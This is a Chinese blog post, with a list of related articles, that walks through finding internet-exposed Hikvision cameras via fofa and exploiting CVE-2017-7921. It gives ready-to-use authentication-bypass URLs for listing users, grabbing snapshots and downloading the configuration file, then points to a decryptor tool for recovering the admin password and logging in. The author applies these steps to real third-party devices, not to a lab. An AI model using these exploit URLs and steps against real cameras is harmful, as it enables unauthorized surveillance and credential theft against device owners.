海康威视CVE-2017-7921漏洞查找与利用

最新推荐文章于 2025-03-26 08:09:11 发布
最新推荐文章于 2025-03-26 08:09:11 发布
阅读量3.4k 收藏 13
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AngrySnack/article/details/133764069
版权

之前查看摄像头时发现了海康威视的存在CVE-2017-7921漏洞,因此找个试下。

1、fofa搜索

直接查找海康威视和中国地区的,很遗憾大部分都不能利用

点进去就能看到登录的后台地址

可以进行弱口令尝试,此处有点困难。

2、直接查看是否存在CVE-2017-7921漏洞

CVE-2017-7921存在3个漏洞

1、检索所有用户及其角色的列表

http://camera.ip/Security/users?auth=YWRtaW46MTEK

2、在没有身份验证的情况下获取摄像头快照

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

3、下载摄像头配置账号密码文件

http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

在fofa中找到的ip大部分漏洞已被修复,如果想要尝试这个漏洞,可能得找一会

3、还原配置文件账号密码

exe地址

https://github.com/Bin4xin/bigger-than-bigger/blob/master/CoVV/Hikvision%20Unauth/hikvision-decrypter.exe

使用方式简介,打开下载的配置文件–>加密 --> 解密 --> 输出 --> 二进制文件读取

当然导入时需要选择加密

打开文件后,从之前的users中得到登录账号名为admin,可以直接搜索,找到对应的密码。

4、登录尝试


可以关注公众号:码字的秃猴,一起玩耍哦

AngrySnack
关注
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 6194
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
海康威视 CVE-2017-7921 未授权
01-12 496
成功利用这些漏洞可能会导致恶意攻击者提升其权限或假设已验证用户的身份并获取敏感数据。
海康威视漏洞合集
weixin_46626737的博客
07-03 5855
解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头。poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc。漏洞版本:大多数设备。
2025年最新CVE-2017-7921漏洞复现
最新发布
2303_78851087的博客
03-26 1208
2025年最新CVE-2017-7921漏洞复现
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
菜鸟学渗透
10-08 3393
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现
菜鸟学渗透
05-22 1万+
这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。
海康威视 CVE-2017-7921 漏洞复现
q857857ytt的博客
11-30 1463
直接在输入框里搜:HiKvision Digital Technology Co该api接口可以未授权访问,获取监控的快照 (打码了,啥都看不到是正常的)下载摄像头配置账号密码文件访问该路由之后浏览器会自动下载一个名为configurationFile的文件,如下4.从网上下载解密二进制文件直接download下载、解压将 configurationFile 文件替换成刚刚下载的运行命令账号和密码就解密出来了让你下载插件,这里用360或者搜狗浏览器开兼容模式就可以访问。
CVE-2017-7921漏洞复现
qq_22132931的博客
05-12 2409
CVE-2017-7921漏洞复现
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
海康威视CVE-2017-7921
qq_46527139的博客
12-22 1万+
海康威视CVE-2017-7921
海康威视综合安防管理平台 detection 前台RCE漏洞复现
0xSec
07-22 5693
海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
漏洞复现】Hikvision摄像头产品越权漏洞(CVE-2017-7921)
晚风不及你
01-20 2667
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 8729
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
海康摄像头CVE-2021-36260漏洞复现
热门推荐
剁椒鱼头没剁椒的博客
01-06 3万+
攻击者利用漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP 摄像头外,还可以访问和攻击内部网络。该漏洞利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS 服务器端口(80/443)即可利用漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 1万+
海康威视越权访问CVE-2021-7921漏洞复现
海康威视2021漏洞
12-31
### 关于海康威视2021年安全漏洞详情 #### CVE-2021-36260 漏洞概述 海康威视作为全球领先的安防监控设备制造商,在2021年被曝出存在一个严重的远程代码执行(RCE)漏洞,编号为CVE-2021-36260。此漏洞使未经身份验证的攻击者可以通过发送特制的HTTP请求来获得目标系统的root权限,从而全面掌控受影响的IP摄像机,并有可能进一步威胁到内部网络安全[^1]。 #### 影响范围 根据测试者的反馈,该漏洞实际上早在2016年就已经存在于某些型号的产品中,只是直到2021年才公开报道。通常情况下,2021年上半年之前生产的大多数海康威视摄像头都有可能存在这个问题。具体影响哪些版本还需依据官方公告确认[^2]。 #### 技术细节风险评估 在`/bic/ssoService/v1/keepAlive`接口上发现了另一个类似的远程命令执行漏洞,这表明除了前端设备外,后台管理系统也受到了影响。攻击者能够通过精心构建的有效载荷(Payload),成功触发这些漏洞并取得服务器的操作系统级别访问权。此类问题不仅限于单一API端点;其他服务也可能受到影响,因此进行全面的安全审查至关重要[^3]。 #### 修复措施 对于上述提到的各种形式的RCE漏洞,最有效的解决方案是尽快升级至厂商发布的最新固件或补丁程序。确保所有联网硬件运行最新的稳定版软件可以有效防止已知漏洞带来的潜在威胁。此外,定期检查官方渠道发布的信息和技术支持文档也是保持系统安全性的重要手段之一[^4]。 ```bash # 更新海康威视设备固件示例命令 (假设使用Linux环境下的wget工具下载更新包) $ wget http://example.com/path/to/latest/firmware.bin $ hikvision-firmware-updater firmware.bin ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值